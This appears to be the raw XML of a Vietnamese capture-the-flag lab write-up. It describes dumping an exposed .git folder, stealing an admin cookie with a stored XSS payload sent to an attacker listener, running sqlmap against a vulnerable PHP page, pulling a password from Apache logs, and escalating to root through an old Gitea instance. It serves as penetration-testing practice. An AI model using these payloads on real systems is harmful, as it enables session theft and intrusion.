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B1: Scanning network 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982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268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129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46.44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t xml:space="preserve">Cổng 22 và 80 đang mở </w:t>
      </w:r>
      <w:r/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Truy cập vào web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B2: Enumeration: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7318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8243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173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71.1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226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3550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822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01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t xml:space="preserve">Ta có thấy thư mục .git -&gt; nghĩ tới ngay dùng git dumper và git extractor để lục lọi</w:t>
      </w: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349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4540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334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41.3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Git dump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/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Git extract</w:t>
      </w:r>
      <w:r/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491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80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649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08.5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/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kết quả thấy được các file php</w:t>
      </w:r>
      <w:r/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091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172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409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347.1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701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0282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927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51.7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đọc mã nguồn của trang join.php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thấy đây sử dụng phương thức GET -&gt; có thể tấn công Stored XSS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Mật khẩu sử dụng là md5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8232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6855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8823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48.2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Trong file admin.php, ta tìm thấy 1 admin là ‘axel’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/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trong file accept_cat.php ta thấy có 1 câu lệnh SQL mà truyền trực tiếp cat_name vào mà k thông qua bất kỳ lọc nào,</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="1091"/>
        </w:tabs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8088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2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780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18.9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B3: exploit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-&gt; ta phải XSS để vào được tài khoản axel với quyền admin và truy cập vào trang accept_cat để cso thể sql injection.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thực hiện XSS bắt cookie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6291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6459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2629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35.6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sử dụng 1 xxs như sau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&lt;script&gt;document.location='http://10.10.xx.xx:1234/?c='+document.cookie;&lt;/script&gt;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tham gia vào gửi 1 form cuộc thi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05466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5847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6054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476.7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/>
      </w:pPr>
      <w:r/>
      <w:r/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Với việc điều hướng qua web server của chúng ta và kèm theo đó là cookie của trang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Khi có tài khoản admin xem bài thì ta sẽ có được cookie của admin từ đó đăng nhập với quyền admin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0512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821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005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79.1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Tạo 1 yêu cầu mèo mới và truy cập vào trang accept_cat.php để có thể thực thi SQL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dùng câu lệnh này và có thể thấy được thông tin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sqlmap -r newfile -p catName --level=5 --risk=3 --tables --dump  --dbms=sqlite --threads=10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2992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804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629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49.60pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                <v:imagedata r:id="rId20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lấy được thông tin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2424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69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424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90.8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Với việc biết chạy apache2, ta có thể xem qua apache log để thấy thông tin mật khẩu của tài khoản axel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2331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305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623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49.0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có mk: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="b0b0b0"/>
          <w:sz w:val="20"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">aNdZwgC4tI9gnVXv_e3Q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đăng nhập và lấy được user flag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21621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777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143500" cy="2162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05.00pt;height:170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Để ý khi ssh vào thì ta có thể thấy 1 thông báo là có 1 mail mới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9239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7961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372100" cy="923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23.00pt;height:72.7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26193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20328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143500" cy="2619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05.00pt;height:206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9874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21169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789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40.9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Nội dung mail đáng chú ý là có 1 project = Git tea và chạy trên cổng 3000, ta kiểm tra các cổng trên máy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914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4046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679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132.2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-&gt; sử dụng port forwarding để đăng nhập vào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6421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239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064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83.8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chuyển thông tin từ localhost cổng 3000 ở máy nạn nhận về máy của mình trên cổng 3333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9827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757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59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283.3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Vào web truy cập vào cổng đó và dùng thông tin axel đăng nhập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4286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8593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324349" cy="428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40.50pt;height:33.7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Phiên Gitea này đã cũ và có thể tra xem có khả năng khai thác k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Có 1 exploit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hyperlink r:id="rId31" w:tooltip="https://www.bing.com/search?pglt=387&amp;q=gitea+1.22.0+exploit&amp;cvid=bfc882f2b7654a178f41761cbe366f7d&amp;gs_lcrp=EgRlZGdlKgYIABBFGDkyBggAEEUYOdIBCTEyNDg1ajBqMagCALACAA&amp;FORM=ANNTA1&amp;PC=U531" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186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bing.com/ck/a?!&amp;&amp;p=a67ccd6c603fc96e3e8af36c94343890a3671590a0a8dad59d116f97df0975b3JmltdHM9MTc0NDI0MzIwMA&amp;ptn=3&amp;ver=2&amp;hsh=4&amp;fclid=2e31ed23-1896-65a3-140a-f83019f06489&amp;psq=gitea+1.22.0+exploit&amp;u=a1aHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNTIwNzc&amp;ntb=</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186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1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930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0565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669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288.92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tạo 1 repo mới chứa payload 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>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta gửi 1 email tới để tài khoản kia check thông tin repo thì ta sẽ nhận dc kết quả trả về trên http.server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="1091"/>
        </w:tabs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6302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14555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26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17.82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Khi admin check repo thì ta sẽ nhận được thông tin 1 gói tin http trả về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92002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9098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3892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306.4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Trong này bao gồm cả mật khẩu, từ đó ta đăng nhập thành công vào tk root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309562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807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876799" cy="309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84.00pt;height:243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Đã xong lab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8441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91246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3138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247.12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hyperlink" Target="https://www.bing.com/search?pglt=387&amp;q=gitea+1.22.0+exploit&amp;cvid=bfc882f2b7654a178f41761cbe366f7d&amp;gs_lcrp=EgRlZGdlKgYIABBFGDkyBggAEEUYOdIBCTEyNDg1ajBqMagCALACAA&amp;FORM=ANNTA1&amp;PC=U531" TargetMode="External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2025-04-10T22:36:03Z</dcterms:modified>
</cp:coreProperties>
</file>